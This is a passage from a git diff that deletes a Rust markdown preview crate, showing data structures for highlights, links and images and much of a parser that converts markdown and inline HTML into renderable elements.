Self { - Self { - columns: Vec::new(), - } - } - - pub fn with_columns(columns: Vec) -> Self { - Self { columns } - } -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownBlockQuote { - pub source_range: Range, - pub children: Vec, -} - -#[derive(Debug, Clone)] -pub struct ParsedMarkdownText { - /// Where the text is located in the source Markdown document. - pub source_range: Range, - /// The text content stripped of any formatting symbols. - pub contents: SharedString, - /// The list of highlights contained in the Markdown document. - pub highlights: Vec<(Range, MarkdownHighlight)>, - /// The regions of the Markdown document. - pub regions: Vec<(Range, ParsedRegion)>, -} - -/// A run of highlighted Markdown text. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum MarkdownHighlight { - /// A styled Markdown highlight. - Style(MarkdownHighlightStyle), - /// A highlighted code block. - Code(HighlightId), -} - -impl MarkdownHighlight { - /// Converts this [`MarkdownHighlight`] to a [`HighlightStyle`]. - pub fn to_highlight_style(&self, theme: &theme::SyntaxTheme) -> Option { - match self { - MarkdownHighlight::Style(style) => { - let mut highlight = HighlightStyle::default(); - - if style.italic { - highlight.font_style = Some(FontStyle::Italic); - } - - if style.underline { - highlight.underline = Some(UnderlineStyle { - thickness: px(1.), - ..Default::default() - }); - } - - if style.strikethrough { - highlight.strikethrough = Some(StrikethroughStyle { - thickness: px(1.), - ..Default::default() - }); - } - - if style.weight != FontWeight::default() { - highlight.font_weight = Some(style.weight); - } - - if style.link { - highlight.underline = Some(UnderlineStyle { - thickness: px(1.), - ..Default::default() - }); - } - - if style.oblique { - highlight.font_style = Some(FontStyle::Oblique) - } - - Some(highlight) - } - - MarkdownHighlight::Code(id) => id.style(theme), - } - } -} - -/// The style for a Markdown highlight. 
-#[derive(Debug, Clone, Default, PartialEq, Eq)] -pub struct MarkdownHighlightStyle { - /// Whether the text should be italicized. - pub italic: bool, - /// Whether the text should be underlined. - pub underline: bool, - /// Whether the text should be struck through. - pub strikethrough: bool, - /// The weight of the text. - pub weight: FontWeight, - /// Whether the text should be stylized as link. - pub link: bool, - // Whether the text should be obliqued. - pub oblique: bool, -} - -/// A parsed region in a Markdown document. -#[derive(Debug, Clone)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedRegion { - /// Whether the region is a code block. - pub code: bool, - /// The link contained in this region, if it has one. - pub link: Option, -} - -/// A Markdown link. -#[derive(Debug, Clone)] -#[cfg_attr(test, derive(PartialEq))] -pub enum Link { - /// A link to a webpage. - Web { - /// The URL of the webpage. - url: String, - }, - /// A link to a path on the filesystem. - Path { - /// The path as provided in the Markdown document. - display_path: PathBuf, - /// The absolute path to the item. 
- path: PathBuf, - }, -} - -impl Link { - pub fn identify(file_location_directory: Option, text: String) -> Option { - if text.starts_with("http") { - return Some(Link::Web { url: text }); - } - - // URL decode the text to handle spaces and other special characters - let decoded_text = urlencoding::decode(&text) - .map(|s| s.into_owned()) - .unwrap_or(text); - - let path = PathBuf::from(&decoded_text); - if path.is_absolute() && path.exists() { - return Some(Link::Path { - display_path: path.clone(), - path, - }); - } - - if let Some(file_location_directory) = file_location_directory { - let display_path = path; - let path = file_location_directory.join(decoded_text); - if path.exists() { - return Some(Link::Path { display_path, path }); - } - } - - None - } -} - -impl Display for Link { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - Link::Web { url } => write!(f, "{}", url), - Link::Path { display_path, .. } => write!(f, "{}", display_path.display()), - } - } -} - -/// A Markdown Image -#[derive(Debug, Clone)] -#[cfg_attr(test, derive(PartialEq))] -pub struct Image { - pub link: Link, - pub source_range: Range, - pub alt_text: Option, - pub width: Option, - pub height: Option, -} - -impl Image { - pub fn identify( - text: String, - source_range: Range, - file_location_directory: Option, - ) -> Option { - let link = Link::identify(file_location_directory, text)?; - Some(Self { - source_range, - link, - alt_text: None, - width: None, - height: None, - }) - } - - pub fn set_alt_text(&mut self, alt_text: SharedString) { - self.alt_text = Some(alt_text); - } - - pub fn set_width(&mut self, width: DefiniteLength) { - self.width = Some(width); - } - - pub fn set_height(&mut self, height: DefiniteLength) { - self.height = Some(height); - } -} diff --git a/crates/markdown_preview/src/markdown_parser.rs b/crates/markdown_preview/src/markdown_parser.rs deleted file mode 100644 index 
59f18647d3ca8ac4937b2e411c8b9bb8e33550b7..0000000000000000000000000000000000000000 --- a/crates/markdown_preview/src/markdown_parser.rs +++ /dev/null @@ -1,3270 +0,0 @@ -use crate::{ - markdown_elements::*, - markdown_minifier::{Minifier, MinifierOptions}, -}; -use async_recursion::async_recursion; -use collections::FxHashMap; -use gpui::{DefiniteLength, FontWeight, px, relative}; -use html5ever::{ParseOpts, local_name, parse_document, tendril::TendrilSink}; -use language::LanguageRegistry; -use markup5ever_rcdom::RcDom; -use pulldown_cmark::{Alignment, Event, Options, Parser, Tag, TagEnd}; -use std::{ - cell::RefCell, collections::HashMap, mem, ops::Range, path::PathBuf, rc::Rc, sync::Arc, vec, -}; -use ui::SharedString; - -pub async fn parse_markdown( - markdown_input: &str, - file_location_directory: Option, - language_registry: Option>, -) -> ParsedMarkdown { - let mut options = Options::all(); - options.remove(pulldown_cmark::Options::ENABLE_DEFINITION_LIST); - - let parser = Parser::new_ext(markdown_input, options); - let parser = MarkdownParser::new( - parser.into_offset_iter().collect(), - file_location_directory, - language_registry, - ); - let renderer = parser.parse_document().await; - ParsedMarkdown { - children: renderer.parsed, - } -} - -fn cleanup_html(source: &str) -> Vec { - let mut writer = std::io::Cursor::new(Vec::new()); - let mut reader = std::io::Cursor::new(source); - let mut minify = Minifier::new( - &mut writer, - MinifierOptions { - omit_doctype: true, - collapse_whitespace: true, - ..Default::default() - }, - ); - if let Ok(()) = minify.minify(&mut reader) { - writer.into_inner() - } else { - source.bytes().collect() - } -} - -struct MarkdownParser<'a> { - tokens: Vec<(Event<'a>, Range)>, - /// The current index in the tokens array - cursor: usize, - /// The blocks that we have successfully parsed so far - parsed: Vec, - file_location_directory: Option, - language_registry: Option>, -} - -#[derive(Debug)] -struct ParseHtmlNodeContext { - 
list_item_depth: u16, -} - -impl Default for ParseHtmlNodeContext { - fn default() -> Self { - Self { list_item_depth: 1 } - } -} - -struct MarkdownListItem { - content: Vec, - item_type: ParsedMarkdownListItemType, -} - -impl Default for MarkdownListItem { - fn default() -> Self { - Self { - content: Vec::new(), - item_type: ParsedMarkdownListItemType::Unordered, - } - } -} - -impl<'a> MarkdownParser<'a> { - fn new( - tokens: Vec<(Event<'a>, Range)>, - file_location_directory: Option, - language_registry: Option>, - ) -> Self { - Self { - tokens, - file_location_directory, - language_registry, - cursor: 0, - parsed: vec![], - } - } - - fn eof(&self) -> bool { - if self.tokens.is_empty() { - return true; - } - self.cursor >= self.tokens.len() - 1 - } - - fn peek(&self, steps: usize) -> Option<&(Event<'_>, Range)> { - if self.eof() || (steps + self.cursor) >= self.tokens.len() { - return self.tokens.last(); - } - self.tokens.get(self.cursor + steps) - } - - fn previous(&self) -> Option<&(Event<'_>, Range)> { - if self.cursor == 0 || self.cursor > self.tokens.len() { - return None; - } - self.tokens.get(self.cursor - 1) - } - - fn current(&self) -> Option<&(Event<'_>, Range)> { - self.peek(0) - } - - fn current_event(&self) -> Option<&Event<'_>> { - self.current().map(|(event, _)| event) - } - - fn is_text_like(event: &Event) -> bool { - match event { - Event::Text(_) - // Represent an inline code block - | Event::Code(_) - | Event::Html(_) - | Event::InlineHtml(_) - | Event::FootnoteReference(_) - | Event::Start(Tag::Link { .. }) - | Event::Start(Tag::Emphasis) - | Event::Start(Tag::Strong) - | Event::Start(Tag::Strikethrough) - | Event::Start(Tag::Image { .. 
}) => { - true - } - _ => false, - } - } - - async fn parse_document(mut self) -> Self { - while !self.eof() { - if let Some(block) = self.parse_block().await { - self.parsed.extend(block); - } else { - self.cursor += 1; - } - } - self - } - - #[async_recursion] - async fn parse_block(&mut self) -> Option> { - let (current, source_range) = self.current().unwrap(); - let source_range = source_range.clone(); - match current { - Event::Start(tag) => match tag { - Tag::Paragraph => { - self.cursor += 1; - let text = self.parse_text(false, Some(source_range)); - Some(vec![ParsedMarkdownElement::Paragraph(text)]) - } - Tag::Heading { level, .. } => { - let level = *level; - self.cursor += 1; - let heading = self.parse_heading(level); - Some(vec![ParsedMarkdownElement::Heading(heading)]) - } - Tag::Table(alignment) => { - let alignment = alignment.clone(); - self.cursor += 1; - let table = self.parse_table(alignment); - Some(vec![ParsedMarkdownElement::Table(table)]) - } - Tag::List(order) => { - let order = *order; - self.cursor += 1; - let list = self.parse_list(order).await; - Some(list) - } - Tag::BlockQuote(_kind) => { - self.cursor += 1; - let block_quote = self.parse_block_quote().await; - Some(vec![ParsedMarkdownElement::BlockQuote(block_quote)]) - } - Tag::CodeBlock(kind) => { - let (language, scale) = match kind { - pulldown_cmark::CodeBlockKind::Indented => (None, None), - pulldown_cmark::CodeBlockKind::Fenced(language) => { - if language.is_empty() { - (None, None) - } else { - let parts: Vec<&str> = language.split_whitespace().collect(); - let lang = parts.first().map(|s| s.to_string()); - let scale = parts.get(1).and_then(|s| s.parse::().ok()); - (lang, scale) - } - } - }; - - self.cursor += 1; - - if language.as_deref() == Some("mermaid") { - let mermaid_diagram = self.parse_mermaid_diagram(scale).await?; - Some(vec![ParsedMarkdownElement::MermaidDiagram(mermaid_diagram)]) - } else { - let code_block = self.parse_code_block(language).await?; - 
Some(vec![ParsedMarkdownElement::CodeBlock(code_block)]) - } - } - Tag::HtmlBlock => { - self.cursor += 1; - - Some(self.parse_html_block().await) - } - _ => None, - }, - Event::Rule => { - self.cursor += 1; - Some(vec![ParsedMarkdownElement::HorizontalRule(source_range)]) - } - _ => None, - } - } - - fn parse_text( - &mut self, - should_complete_on_soft_break: bool, - source_range: Option>, - ) -> MarkdownParagraph { - let source_range = source_range.unwrap_or_else(|| { - self.current() - .map(|(_, range)| range.clone()) - .unwrap_or_default() - }); - - let mut markdown_text_like = Vec::new(); - let mut text = String::new(); - let mut bold_depth = 0; - let mut italic_depth = 0; - let mut strikethrough_depth = 0; - let mut link: Option = None; - let mut image: Option = None; - let mut regions: Vec<(Range, ParsedRegion)> = vec![]; - let mut highlights: Vec<(Range, MarkdownHighlight)> = vec![]; - let mut link_urls: Vec = vec![]; - let mut link_ranges: Vec> = vec![]; - - loop { - if self.eof() { - break; - } - - let (current, _) = self.current().unwrap(); - let prev_len = text.len(); - match current { - Event::SoftBreak => { - if should_complete_on_soft_break { - break; - } - text.push(' '); - } - - Event::HardBreak => { - text.push('\n'); - } - - // We want to ignore any inline HTML tags in the text but keep - // the text between them - Event::InlineHtml(_) => {} - - Event::Text(t) => { - text.push_str(t.as_ref()); - let mut style = MarkdownHighlightStyle::default(); - - if bold_depth > 0 { - style.weight = FontWeight::BOLD; - } - - if italic_depth > 0 { - style.italic = true; - } - - if strikethrough_depth > 0 { - style.strikethrough = true; - } - - let last_run_len = if let Some(link) = link.clone() { - regions.push(( - prev_len..text.len(), - ParsedRegion { - code: false, - link: Some(link), - }, - )); - style.link = true; - prev_len - } else { - // Manually scan for links - let mut finder = linkify::LinkFinder::new(); - finder.kinds(&[linkify::LinkKind::Url]); - 
let mut last_link_len = prev_len; - for link in finder.links(t) { - let start = prev_len + link.start(); - let end = prev_len + link.end(); - let range = start..end; - link_ranges.push(range.clone()); - link_urls.push(link.as_str().to_string()); - - // If there is a style before we match a link, we have to add this to the highlighted ranges - if style != MarkdownHighlightStyle::default() && last_link_len < start { - highlights.push(( - last_link_len..start, - MarkdownHighlight::Style(style.clone()), - )); - } - - highlights.push(( - range.clone(), - MarkdownHighlight::Style(MarkdownHighlightStyle { - underline: true, - ..style - }), - )); - - regions.push(( - range.clone(), - ParsedRegion { - code: false, - link: Some(Link::Web { - url: link.as_str().to_string(), - }), - }, - )); - last_link_len = end; - } - last_link_len - }; - - if style != MarkdownHighlightStyle::default() && last_run_len < text.len() { - let mut new_highlight = true; - if let Some((last_range, last_style)) = highlights.last_mut() - && last_range.end == last_run_len - && last_style == &MarkdownHighlight::Style(style.clone()) - { - last_range.end = text.len(); - new_highlight = false; - } - if new_highlight { - highlights.push(( - last_run_len..text.len(), - MarkdownHighlight::Style(style.clone()), - )); - } - } - } - Event::Code(t) => { - text.push_str(t.as_ref()); - let range = prev_len..text.len(); - - if link.is_some() { - highlights.push(( - range.clone(), - MarkdownHighlight::Style(MarkdownHighlightStyle { - link: true, - ..Default::default() - }), - )); - } - regions.push(( - range, - ParsedRegion { - code: true, - link: link.clone(), - }, - )); - } - Event::Start(tag) => match tag { - Tag::Emphasis => italic_depth += 1, - Tag::Strong => bold_depth += 1, - Tag::Strikethrough => strikethrough_depth += 1, - Tag::Link { dest_url, .. } => { - link = Link::identify( - self.file_location_directory.clone(), - dest_url.to_string(), - ); - } - Tag::Image { dest_url, .. 
} => { - if !text.is_empty() { - let parsed_regions = MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: source_range.clone(), - contents: mem::take(&mut text).into(), - highlights: mem::take(&mut highlights), - regions: mem::take(&mut regions), - }); - markdown_text_like.push(parsed_regions); - } - image = Image::identify( - dest_url.to_string(), - source_range.clone(), - self.file_location_directory.clone(), - ); - } - _ => { - break; - } - }, - - Event::End(tag) => match tag { - TagEnd::Emphasis => italic_depth -= 1, - TagEnd::Strong => bold_depth -= 1, - TagEnd::Strikethrough => strikethrough_depth -= 1, - TagEnd::Link => { - link = None; - } - TagEnd::Image => { - if let Some(mut image) = image.take() { - if !text.is_empty() { - image.set_alt_text(std::mem::take(&mut text).into()); - mem::take(&mut highlights); - mem::take(&mut regions); - } - markdown_text_like.push(MarkdownParagraphChunk::Image(image)); - } - } - TagEnd::Paragraph => { - self.cursor += 1; - break; - } - _ => { - break; - } - }, - _ => { - break; - } - } - - self.cursor += 1; - } - if !text.is_empty() { - markdown_text_like.push(MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range, - contents: text.into(), - highlights, - regions, - })); - } - markdown_text_like - } - - fn parse_heading(&mut self, level: pulldown_cmark::HeadingLevel) -> ParsedMarkdownHeading { - let (_event, source_range) = self.previous().unwrap(); - let source_range = source_range.clone(); - let text = self.parse_text(true, None); - - // Advance past the heading end tag - self.cursor += 1; - - ParsedMarkdownHeading { - source_range, - level: match level { - pulldown_cmark::HeadingLevel::H1 => HeadingLevel::H1, - pulldown_cmark::HeadingLevel::H2 => HeadingLevel::H2, - pulldown_cmark::HeadingLevel::H3 => HeadingLevel::H3, - pulldown_cmark::HeadingLevel::H4 => HeadingLevel::H4, - pulldown_cmark::HeadingLevel::H5 => HeadingLevel::H5, - pulldown_cmark::HeadingLevel::H6 => HeadingLevel::H6, - }, - 
contents: text, - } - } - - fn parse_table(&mut self, alignment: Vec) -> ParsedMarkdownTable { - let (_event, source_range) = self.previous().unwrap(); - let source_range = source_range.clone(); - let mut header = vec![]; - let mut body = vec![]; - let mut row_columns = vec![]; - let mut in_header = true; - let column_alignments = alignment - .iter() - .map(Self::convert_alignment) - .collect::>(); - - loop { - if self.eof() { - break; - } - - let (current, source_range) = self.current().unwrap(); - let source_range = source_range.clone(); - match current { - Event::Start(Tag::TableHead) - | Event::Start(Tag::TableRow) - | Event::End(TagEnd::TableCell) => { - self.cursor += 1; - } - Event::Start(Tag::TableCell) => { - self.cursor += 1; - let cell_contents = self.parse_text(false, Some(source_range)); - row_columns.push(ParsedMarkdownTableColumn { - col_span: 1, - row_span: 1, - is_header: in_header, - children: cell_contents, - alignment: column_alignments - .get(row_columns.len()) - .copied() - .unwrap_or_default(), - }); - } - Event::End(TagEnd::TableHead) | Event::End(TagEnd::TableRow) => { - self.cursor += 1; - let columns = std::mem::take(&mut row_columns); - if in_header { - header.push(ParsedMarkdownTableRow { columns: columns }); - in_header = false; - } else { - body.push(ParsedMarkdownTableRow::with_columns(columns)); - } - } - Event::End(TagEnd::Table) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - ParsedMarkdownTable { - source_range, - header, - body, - caption: None, - } - } - - fn convert_alignment(alignment: &Alignment) -> ParsedMarkdownTableAlignment { - match alignment { - Alignment::None => ParsedMarkdownTableAlignment::None, - Alignment::Left => ParsedMarkdownTableAlignment::Left, - Alignment::Center => ParsedMarkdownTableAlignment::Center, - Alignment::Right => ParsedMarkdownTableAlignment::Right, - } - } - - async fn parse_list(&mut self, order: Option) -> Vec { - let (_, list_source_range) = self.previous().unwrap(); 
- - let mut items = Vec::new(); - let mut items_stack = vec![MarkdownListItem::default()]; - let mut depth = 1; - let mut order = order; - let mut order_stack = Vec::new(); - - let mut insertion_indices = FxHashMap::default(); - let mut source_ranges = FxHashMap::default(); - let mut start_item_range = list_source_range.clone(); - - while !self.eof() { - let (current, source_range) = self.current().unwrap(); - match current { - Event::Start(Tag::List(new_order)) => { - if items_stack.last().is_some() && !insertion_indices.contains_key(&depth) { - insertion_indices.insert(depth, items.len()); - } - - // We will use the start of the nested list as the end for the current item's range, - // because we don't care about the hierarchy of list items - if let collections::hash_map::Entry::Vacant(e) = source_ranges.entry(depth) { - e.insert(start_item_range.start..source_range.start); - } - - order_stack.push(order); - order = *new_order; - self.cursor += 1; - depth += 1; - } - Event::End(TagEnd::List(_)) => { - order = order_stack.pop().flatten(); - self.cursor += 1; - depth -= 1; - - if depth == 0 { - break; - } - } - Event::Start(Tag::Item) => { - start_item_range = source_range.clone(); - - self.cursor += 1; - items_stack.push(MarkdownListItem::default()); - - let mut task_list = None; - // Check for task list marker (`- [ ]` or `- [x]`) - if let Some(event) = self.current_event() { - // If there is a linebreak in between two list items the task list marker will actually be the first element of the paragraph - if event == &Event::Start(Tag::Paragraph) { - self.cursor += 1; - } - - if let Some((Event::TaskListMarker(checked), range)) = self.current() { - task_list = Some((*checked, range.clone())); - self.cursor += 1; - } - } - - if let Some((event, range)) = self.current() { - // This is a plain list item. - // For example `- some text` or `1. 
[Docs](./docs.md)` - if MarkdownParser::is_text_like(event) { - let text = self.parse_text(false, Some(range.clone())); - let block = ParsedMarkdownElement::Paragraph(text); - if let Some(content) = items_stack.last_mut() { - let item_type = if let Some((checked, range)) = task_list { - ParsedMarkdownListItemType::Task(checked, range) - } else if let Some(order) = order { - ParsedMarkdownListItemType::Ordered(order) - } else { - ParsedMarkdownListItemType::Unordered - }; - content.item_type = item_type; - content.content.push(block); - } - } else { - let block = self.parse_block().await; - if let Some(block) = block - && let Some(list_item) = items_stack.last_mut() - { - list_item.content.extend(block); - } - } - } - - // If there is a linebreak in between two list items the task list marker will actually be the first element of the paragraph - if self.current_event() == Some(&Event::End(TagEnd::Paragraph)) { - self.cursor += 1; - } - } - Event::End(TagEnd::Item) => { - self.cursor += 1; - - if let Some(current) = order { - order = Some(current + 1); - } - - if let Some(list_item) = items_stack.pop() { - let source_range = source_ranges - .remove(&depth) - .unwrap_or(start_item_range.clone()); - - // We need to remove the last character of the source range, because it includes the newline character - let source_range = source_range.start..source_range.end - 1; - let item = ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - source_range, - content: list_item.content, - depth, - item_type: list_item.item_type, - nested: false, - }); - - if let Some(index) = insertion_indices.get(&depth) { - items.insert(*index, item); - insertion_indices.remove(&depth); - } else { - items.push(item); - } - } - } - _ => { - if depth == 0 { - break; - } - // This can only happen if a list item starts with more then one paragraph, - // or the list item contains blocks that should be rendered after the nested list items - let block = self.parse_block().await; - if let Some(block) 
= block { - if let Some(list_item) = items_stack.last_mut() { - // If we did not insert any nested items yet (in this case insertion index is set), we can append the block to the current list item - if !insertion_indices.contains_key(&depth) { - list_item.content.extend(block); - continue; - } - } - - // Otherwise we need to insert the block after all the nested items - // that have been parsed so far - items.extend(block); - } else { - self.cursor += 1; - } - } - } - } - - items - } - - #[async_recursion] - async fn parse_block_quote(&mut self) -> ParsedMarkdownBlockQuote { - let (_event, source_range) = self.previous().unwrap(); - let source_range = source_range.clone(); - let mut nested_depth = 1; - - let mut children: Vec = vec![]; - - while !self.eof() { - let block = self.parse_block().await; - - if let Some(block) = block { - children.extend(block); - } else { - break; - } - - if self.eof() { - break; - } - - let (current, _source_range) = self.current().unwrap(); - match current { - // This is a nested block quote. - // Record that we're in a nested block quote and continue parsing. - // We don't need to advance the cursor since the next - // call to `parse_block` will handle it. 
- Event::Start(Tag::BlockQuote(_kind)) => { - nested_depth += 1; - } - Event::End(TagEnd::BlockQuote(_kind)) => { - nested_depth -= 1; - if nested_depth == 0 { - self.cursor += 1; - break; - } - } - _ => {} - }; - } - - ParsedMarkdownBlockQuote { - source_range, - children, - } - } - - async fn parse_code_block( - &mut self, - language: Option, - ) -> Option { - let Some((_event, source_range)) = self.previous() else { - return None; - }; - - let source_range = source_range.clone(); - let mut code = String::new(); - - while !self.eof() { - let Some((current, _source_range)) = self.current() else { - break; - }; - - match current { - Event::Text(text) => { - code.push_str(text); - self.cursor += 1; - } - Event::End(TagEnd::CodeBlock) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - code = code.strip_suffix('\n').unwrap_or(&code).to_string(); - - let highlights = if let Some(language) = &language { - if let Some(registry) = &self.language_registry { - let rope: language::Rope = code.as_str().into(); - registry - .language_for_name_or_extension(language) - .await - .map(|l| l.highlight_text(&rope, 0..code.len())) - .ok() - } else { - None - } - } else { - None - }; - - Some(ParsedMarkdownCodeBlock { - source_range, - contents: code.into(), - language, - highlights, - }) - } - - async fn parse_mermaid_diagram( - &mut self, - scale: Option, - ) -> Option { - let Some((_event, source_range)) = self.previous() else { - return None; - }; - - let source_range = source_range.clone(); - let mut code = String::new(); - - while !self.eof() { - let Some((current, _source_range)) = self.current() else { - break; - }; - - match current { - Event::Text(text) => { - code.push_str(text); - self.cursor += 1; - } - Event::End(TagEnd::CodeBlock) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - code = code.strip_suffix('\n').unwrap_or(&code).to_string(); - - let scale = scale.unwrap_or(100).clamp(10, 500); - - 
Some(ParsedMarkdownMermaidDiagram { - source_range, - contents: ParsedMarkdownMermaidDiagramContents { - contents: code.into(), - scale, - }, - }) - } - - async fn parse_html_block(&mut self) -> Vec { - let mut elements = Vec::new(); - let Some((_event, _source_range)) = self.previous() else { - return elements; - }; - - let mut html_source_range_start = None; - let mut html_source_range_end = None; - let mut html_buffer = String::new(); - - while !self.eof() { - let Some((current, source_range)) = self.current() else { - break; - }; - let source_range = source_range.clone(); - match current { - Event::Html(html) => { - html_source_range_start.get_or_insert(source_range.start); - html_source_range_end = Some(source_range.end); - html_buffer.push_str(html); - self.cursor += 1; - } - Event::End(TagEnd::CodeBlock) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - let bytes = cleanup_html(&html_buffer); - - let mut cursor = std::io::Cursor::new(bytes); - if let Ok(dom) = parse_document(RcDom::default(), ParseOpts::default()) - .from_utf8() - .read_from(&mut cursor) - && let Some((start, end)) = html_source_range_start.zip(html_source_range_end) - { - self.parse_html_node( - start..end, - &dom.document, - &mut elements, - &ParseHtmlNodeContext::default(), - ); - } - - elements - } - - fn parse_html_node( - &self, - source_range: Range, - node: &Rc, - elements: &mut Vec, - context: &ParseHtmlNodeContext, - ) { - match &node.data { - markup5ever_rcdom::NodeData::Document => { - self.consume_children(source_range, node, elements, context); - } - markup5ever_rcdom::NodeData::Text { contents } => { - elements.push(ParsedMarkdownElement::Paragraph(vec![ - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range, - regions: Vec::default(), - highlights: Vec::default(), - contents: contents.borrow().to_string().into(), - }), - ])); - } - markup5ever_rcdom::NodeData::Comment { .. } => {} - markup5ever_rcdom::NodeData::Element { name, attrs, .. 
} => { - let mut styles = if let Some(styles) = Self::markdown_style_from_html_styles( - Self::extract_styles_from_attributes(attrs), - ) { - vec![MarkdownHighlight::Style(styles)] - } else { - Vec::default() - }; - - if local_name!("img") == name.local { - if let Some(image) = self.extract_image(source_range, attrs) { - elements.push(ParsedMarkdownElement::Image(image)); - } - } else if local_name!("p") == name.local { - let mut paragraph = MarkdownParagraph::new(); - self.parse_paragraph( - source_range, - node, - &mut paragraph, - &mut styles, - &mut Vec::new(), - ); - - if !paragraph.is_empty() { - elements.push(ParsedMarkdownElement::Paragraph(paragraph)); - } - } else if matches!( - name.local, - local_name!("h1") - | local_name!("h2") - | local_name!("h3") - | local_name!("h4") - | local_name!("h5") - | local_name!("h6") - ) { - let mut paragraph = MarkdownParagraph::new(); - self.consume_paragraph( - source_range.clone(), - node, - &mut paragraph, - &mut styles, - &mut Vec::new(), - ); - - if !paragraph.is_empty() { - elements.push(ParsedMarkdownElement::Heading(ParsedMarkdownHeading { - source_range, - level: match name.local { - local_name!("h1") => HeadingLevel::H1, - local_name!("h2") => HeadingLevel::H2, - local_name!("h3") => HeadingLevel::H3, - local_name!("h4") => HeadingLevel::H4, - local_name!("h5") => HeadingLevel::H5, - local_name!("h6") => HeadingLevel::H6, - _ => unreachable!(), - }, - contents: paragraph, - })); - } - } else if local_name!("ul") == name.local || local_name!("ol") == name.local { - if let Some(list_items) = self.extract_html_list( - node, - local_name!("ol") == name.local, - context.list_item_depth, - source_range, - ) { - elements.extend(list_items); - } - } else if local_name!("blockquote") == name.local { - if let Some(blockquote) = self.extract_html_blockquote(node, source_range) { - elements.push(ParsedMarkdownElement::BlockQuote(blockquote)); - } - } else if local_name!("table") == name.local { - if let Some(table) = 
self.extract_html_table(node, source_range) { - elements.push(ParsedMarkdownElement::Table(table)); - } - } else { - self.consume_children(source_range, node, elements, context); - } - } - _ => {} - } - } - - fn parse_paragraph( - &self, - source_range: Range, - node: &Rc, - paragraph: &mut MarkdownParagraph, - highlights: &mut Vec, - regions: &mut Vec<(Range, ParsedRegion)>, - ) { - fn items_with_range( - range: Range, - items: impl IntoIterator, - ) -> Vec<(Range, T)> { - items - .into_iter() - .map(|item| (range.clone(), item)) - .collect() - } - - match &node.data { - markup5ever_rcdom::NodeData::Text { contents } => { - // append the text to the last chunk, so we can have a hacky version - // of inline text with highlighting - if let Some(text) = paragraph.iter_mut().last().and_then(|p| match p { - MarkdownParagraphChunk::Text(text) => Some(text), - _ => None, - }) { - let mut new_text = text.contents.to_string(); - new_text.push_str(&contents.borrow()); - - text.highlights.extend(items_with_range( - text.contents.len()..new_text.len(), - std::mem::take(highlights), - )); - text.regions.extend(items_with_range( - text.contents.len()..new_text.len(), - std::mem::take(regions) - .into_iter() - .map(|(_, region)| region), - )); - text.contents = SharedString::from(new_text); - } else { - let contents = contents.borrow().to_string(); - paragraph.push(MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range, - highlights: items_with_range(0..contents.len(), std::mem::take(highlights)), - regions: items_with_range( - 0..contents.len(), - std::mem::take(regions) - .into_iter() - .map(|(_, region)| region), - ), - contents: contents.into(), - })); - } - } - markup5ever_rcdom::NodeData::Element { name, attrs, .. 
} => { - if local_name!("img") == name.local { - if let Some(image) = self.extract_image(source_range, attrs) { - paragraph.push(MarkdownParagraphChunk::Image(image)); - } - } else if local_name!("b") == name.local || local_name!("strong") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - weight: FontWeight::BOLD, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("i") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - italic: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("em") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - oblique: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("del") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - strikethrough: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("ins") == name.local { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - underline: true, - ..Default::default() - })); - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else if local_name!("a") == name.local { - if let Some(url) = Self::attr_value(attrs, local_name!("href")) - && let Some(link) = - Link::identify(self.file_location_directory.clone(), url) - { - highlights.push(MarkdownHighlight::Style(MarkdownHighlightStyle { - link: true, - ..Default::default() - })); - - regions.push(( - source_range.clone(), - ParsedRegion { - code: false, - link: Some(link), - }, - )); - } - - self.consume_paragraph(source_range, node, paragraph, highlights, regions); - } else { - self.consume_paragraph(source_range, node, paragraph, 
highlights, regions); - } - } - _ => {} - } - } - - fn consume_paragraph( - &self, - source_range: Range, - node: &Rc, - paragraph: &mut MarkdownParagraph, - highlights: &mut Vec, - regions: &mut Vec<(Range, ParsedRegion)>, - ) { - for node in node.children.borrow().iter() { - self.parse_paragraph(source_range.clone(), node, paragraph, highlights, regions); - } - } - - fn parse_table_row( - &self, - source_range: Range, - node: &Rc, - ) -> Option { - let mut columns = Vec::new(); - - match &node.data { - markup5ever_rcdom::NodeData::Element { name, .. } => { - if local_name!("tr") != name.local { - return None; - } - - for node in node.children.borrow().iter() { - if let Some(column) = self.parse_table_column(source_range.clone(), node) { - columns.push(column); - } - } - } - _ => {} - } - - if columns.is_empty() { - None - } else { - Some(ParsedMarkdownTableRow { columns }) - } - } - - fn parse_table_column( - &self, - source_range: Range, - node: &Rc, - ) -> Option { - match &node.data { - markup5ever_rcdom::NodeData::Element { name, attrs, .. 
